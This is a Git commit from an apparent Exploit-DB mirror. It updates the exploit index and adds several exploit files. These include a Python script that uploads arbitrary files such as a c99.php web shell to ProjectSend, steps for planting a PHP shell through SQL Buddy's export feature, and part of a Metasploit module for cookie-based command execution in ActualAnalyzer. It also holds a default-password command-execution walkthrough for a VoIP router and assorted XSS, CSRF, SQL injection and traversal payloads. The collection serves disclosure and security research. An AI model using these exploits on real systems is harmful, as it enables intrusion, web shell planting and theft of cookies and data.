bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_18_2014

Browse source
This commit is contained in:
Offensive Security 2014-12-18 04:50:37 +00:00
parent 4353d215d8
commit a4940a7faa
23 changed files with 785 additions and 173 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
files.csv
View file

@ -12700,13 +12700,13 @@ id,file,description,date,author,platform,type,port
14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection Vulnerability",2010-07-31,gendenk,php,webapps,0
14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0
14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0
14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0
14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0
14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0
14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0
14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0
14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0
14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow Exploit",2010-08-02,s-dz,windows,local,0
14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability",2010-08-02,secret,php,webapps,0
14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0
@ -12747,12 +12747,12 @@ id,file,description,date,author,platform,type,port
14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0
14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0
14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0
14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0
14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x Blind SQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
14595,platforms/php/webapps/14595.html,"wizmall 6.4 CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0
14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
@ -12974,7 +12974,7 @@ id,file,description,date,author,platform,type,port
14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0
14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0
14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0
14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0
14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0
14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0
@ -13004,7 +13004,7 @@ id,file,description,date,author,platform,type,port
14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0
14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0
14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0
14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80
14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0
@ -31911,8 +31911,10 @@ id,file,description,date,author,platform,type,port
35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@ -31988,7 +31990,6 @@ id,file,description,date,author,platform,type,port
35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0
35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
@ -32007,10 +32008,23 @@ id,file,description,date,author,platform,type,port
35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0
35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0
35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80
35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 'pid' Parameter SQL Injection Vulnerability",2011-03-30,RoAd_KiLlEr,php,webapps,0
35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0
35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80
35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0
35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80
35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0
35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 '.avi' File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0
35554,platforms/linux/remote/35554.txt,"Perl 5.x 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0
35555,platforms/php/webapps/35555.txt,"AWCM 2.x 'search.php' Cross Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0
35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0
35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection Vulnerability",2011-04-04,KedAns-Dz,php,webapps,0
35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross Site Scripting Vulnerability",2011-04-02,KedAns-Dz,php,webapps,0
35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 'link' Parameter Cross Site Scripting Vulnerability",2011-04-04,"John Leitch",php,webapps,0
35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 'ajax_action' Parameter Cross Site Scripting Vulnerability",2011-04-03,"John Leitch",php,webapps,0
35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 'index.php' Arbitrary File Download Vulnerability",2011-04-03,KedAns-Dz,windows,remote,0

Can't render this file because it is too large.

56
platforms/hardware/webapps/35556.txt Executable file
View file

@ -0,0 +1,56 @@
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
and can lead to Command Execution.
Exploit:
1) Login as a normal user
Default Username: User Password:cikvoip
2) change URL to http://URL/adm/system_command.asp
and now u can run commands.
Example:
Command: ls /etc_rw/web
Result:
internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm

11
platforms/linux/remote/35554.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47124/info
Perl is prone to a security-bypass weakness that occurs when laundering tainted input.
Attackers can leverage this issue to bypass security checks in perl applications that rely on TAINT mode protection functionality. This opens such applications up to potential attacks that take advantage of the software's failure to properly sanitize user-supplied input.
The following example input is available:
> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'
> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'

24
platforms/php/webapps/35424.py Executable file
View file

@ -0,0 +1,24 @@
#!/usr/bin/python
# Exploit Title: ProjectSend r-651 File Upload
# Date: December 01, 2014
# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
# Vendor Homepage: http://www.projectsend.org/
# Software Link: http://www.projectsend.org/download/67/
# Version: r-561
# Tested on: Kubuntu 14.10 x64
import sys
import requests
scriptName = sys.argv[0]
if (len(sys.argv) != 3):
print "Please enter the target path and the file to upload."
print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
quit()
print "Exploiting ProjectSend-r561 File Upload .."
url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
print "Sending Url " + url
files = {'file': open(sys.argv[2], 'rb')}
r = requests.post(url, files=files)
print r.text

40
platforms/php/webapps/35428.txt Executable file
View file

@ -0,0 +1,40 @@
# Exploit Title: SQL Buddy Remote Code Execution
# Date: November 29 2014
# Exploit Author: Fady Osman (@fady_osman)
# Youtube Channel : https://www.youtube.com/user/cutehack3r
# Vendor Homepage: http://sqlbuddy.com/
# Software Link:
https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip
# Version: SQL Buddy 1.3.3
# Tested on: Kubuntu 14.10
SQLBuddy provides a web based mysql administration and it's included in
packages like wamp server.
SQL Buddy suffers from a remote code execution. This happens due to the
fact that it allows the user to login using any server he wants and that it
allows the user to export data from the database to a file on the webserver.
In order to exploit this bug do the following steps:
1- Use a sql server you control and have a valid credentials for (You can
use one of the free mysql hosting services).
2- Create a database and a table with one column of type text.
3- Insert the php code you want to execute into that table.
4- Choose the previously created table from the left menu.
5- Click Export from the top menu.
6- Choose CSV format.
7- Choose "Text File" and name the file with php extension for example
shell.php.
The exported file will be at : sqlbuddy/exports/ assuming you installed
sqlbuddy in a folder named sqlbuddy.
--
*Regards,*
[image: Fady Osman on about.me]
Fady Osman
about.me/Fady_Osman
<http://about.me/Fady_Osman>

9
platforms/php/webapps/35547.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47100/info
ICJobSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ICJobSite 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/icjobsite/index.php?page=position_details&pid=[SQL-Injection]

11
platforms/php/webapps/35548.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47104/info
InTerra Blog Machine is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
InTerra Blog Machine 1.84 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/POST_URL/edit/" method="post" name="main" enctype="multipart/form-data">
<!-- POST_URL like "2011/03/31/post_url" --> <input type="hidden" name="subject" value=&#039;post title"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="content" value=&#039;content&#039;> <input type="hidden" name="date[Date_Day]" value="31"> <input type="hidden" name="date[Date_Month]" value="03"> <input type="hidden" name="date[Date_Year]" value="2011"> <input type="hidden" name="time[Time_Hour]" value="13"> <input type="hidden" name="time[Time_Minute]" value="59"> <input type="hidden" name="comments" value="1"> <input type="hidden" name="section" value="0"> <input type="hidden" name="sectionNewName" value=""> <input type="hidden" name="sectionNewUnix" value=""> <input type="hidden" name="sectionNewHidden" value="0"> <input type="hidden" name="replicate" value="1"> <input type="hidden" name="keywords" value=""> <input type="hidden" name="edit" value="POST_ID"> </form> <script> document.main.submit(); </script>

29
platforms/php/webapps/35550.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/47105/info
Collabtive is prone to multiple remote input-validation vulnerabilities including cross-site scripting, HTML-injection, and directory-traversal issues.
Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, and steal cookie-based authentication credentials.
Collabtive 0.6.5 is vulnerable; other versions may also be affected.
Directory Traversal:
http://www.example.com/thumb.php?pic=./../../../../../tmp/photo.jpg
Cross-site Scripting:
http://www.example.com/managetimetracker.php?action=editform&tid=1&id=1"><script>alert(document.cookie)</script>
http://www.example.com/manageuser.php?action=profile&id=1"><script>alert(document.cookie)</script>
HTML-injection:
<form action="http://www.example.com/manageproject.php?action=edit&id=1" method="post" name="main">
<input type="hidden" name="name" value=&#039;test"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="desc" value="Description">
<input type="hidden" name="end" value="16.03.2011">
</form>
<script>
document.main.submit();
</script>

68
platforms/php/webapps/35551.txt Executable file
View file

@ -0,0 +1,68 @@
Advisory: Persistent XSS Vulnerability in CMS Papoo Light v6
Advisory ID: SROEADV-2014-01
Author: Steffen Rösemann
Affected Software: CMS Papoo Version 6.0.0 Rev. 4701
Vendor URL: http://www.papoo.de/
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
The CMS Papoo Light Version has a persistent XSS vulnerability in its guestbook functionality and in its user-registration functionality.
==================
Technical Details:
==================
XSS-Vulnerability #1:
Papoo Light CMS v6 provides the functionality to post comments on a guestbook via the following url: http://{target-url}/guestbook.php?menuid=6.
The input fields with the id „author“ is vulnerable to XSS which gets stored in the database and makes that vulnerability persistent.
Payload-Examples:
<img src='n' onerror=“javascript:alert('XSS')“ >
<iframe src=“some_remote_source“></iframe>
XSS-Vulnerability #2:
People can register themselves on Papoo Light v6 CMS at http://{target-url}/account.php?menuid=2. Instead of using a proper username, an attacker can inject HTML and/or JavaScriptcode on the username input-field.
Code gets written to the database backend then. Attacker only has to confirm his/her e-mail address to be able to login and spread the code by posting to the forum or the guestbook where the username is displayed.
Payload-Examples:
see above (XSS #1)
=========
Solution:
=========
Update to the latest version
====================
Disclosure Timeline:
====================
13-Dec-2014 found XSS #1
13-Dec-2014 - informed the developers (XSS #1)
14-Dec-2014 found XSS #2
14-Dec-2014 informed the developers (XSS #2)
15-Dec-2014 - release date of this security advisory
15-Dec-2014 - response and fix by vendor
15-Dec-2014 - post on BugTraq
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.papoo.de/
http://sroesemann.blogspot.de

9
platforms/php/webapps/35555.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47126/info
AWCM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AWCM 2.2 and prior versions are vulnerable.
http://www.example.com/awcm/search.php?search=<script>alert("SecPod-XSS-Test")</script>&where=all

7
platforms/php/webapps/35557.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47128/info
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/articles.php?article_id=-1+union+select+version()--

7
platforms/php/webapps/35558.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47130/info
PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[Path]/articles.php?article_id="><script>alert(document.cookie);</script>

13
platforms/php/webapps/35559.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47131/info
MyBB is prone to multiple security vulnerabilities. These vulnerabilities include a username-enumeration weakness, an XML-injection vulnerability, and a cross-site scripting vulnerability.
Exploiting these issues may allow attackers to discern valid usernames, which may aid them in brute-force password cracking or other attacks. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Versions prior to 1.6.2 and 1.4.15 are vulnerable.
XML-injection:
http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cxml/%3E
XSS:
http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E

9
platforms/php/webapps/35561.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47141/info
The WPwizz AdWizz plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AdWizz plugin 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{//

9
platforms/php/webapps/35562.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47142/info
The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Placester 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

264
platforms/unix/remote/35549.rb Executable file
View file

@ -0,0 +1,264 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
'Description' => %q{
This module exploits a command execution vulnerability in
ActualAnalyzer version 2.81 and prior.
The 'aa.php' file allows unauthenticated users to
execute arbitrary commands in the 'ant' cookie.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Benjamin Harris', # Discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '34450'],
['OSVDB', '110601']
],
'Payload' =>
{
'Space' => 4096, # HTTP cookie
'DisableNops' => true,
'BadChars' => "\x00"
},
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Targets' =>
[
# Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu
['ActualAnalyzer <= 2.81', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => 'Aug 28 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
], self.class)
end
#
# Checks if target is running ActualAnalyzer <= 2.81
#
def check
# check for aa.php
res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))
if !res
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
elsif res.code == 404
vprint_error("#{peer} - Could not find aa.php")
return Exploit::CheckCode::Safe
elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/
vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.")
return Exploit::CheckCode::Detected
end
# check version
res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))
if !res
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
vprint_status("#{peer} - Found version: #{version}")
if Gem::Version.new(version) <= Gem::Version.new('2.81')
report_vuln(
host: rhost,
name: self.name,
info: "Module #{fullname} detected ActualAnalyzer #{version}",
refs: references,
)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Detected
elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
#
# Try to retrieve a valid analytics host from view.php unauthenticated
#
def get_analytics_host_view
analytics_host = nil
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'view.php'),
'vars_post' => {
'id_h' => '',
'listp' => '',
'act_h' => 'vis_int',
'oldact' => 'vis_grpg',
'tint_h' => '',
'extact_h' => '',
'home_pos' => '',
'act' => 'vis_grpg',
'tint' => 'total',
'grpg' => '201',
'cp_vst' => 'on',
'cp_hst' => 'on',
'cp_htst' => 'on',
'cp_reps' => 'y',
'tab_sort' => '1_1'
}
)
if !res
vprint_error("#{peer} - Connection failed")
elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
return analytics_host
else
vprint_status("#{peer} - Could not find any hosts on view.php")
end
nil
end
#
# Try to retrieve a valid analytics host from code.php unauthenticated
#
def get_analytics_host_code
analytics_host = nil
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'code.php'),
'vars_get' => {
'pid' => '1'
}
)
if !res
vprint_error("#{peer} - Connection failed")
elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
return analytics_host
else
vprint_status("#{peer} - Could not find any hosts on code.php")
end
nil
end
#
# Try to retrieve a valid analytics host from admin.php with creds
#
def get_analytics_host_admin
analytics_host = nil
user = datastore['USERNAME']
pass = datastore['PASSWORD']
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'vars_post' => {
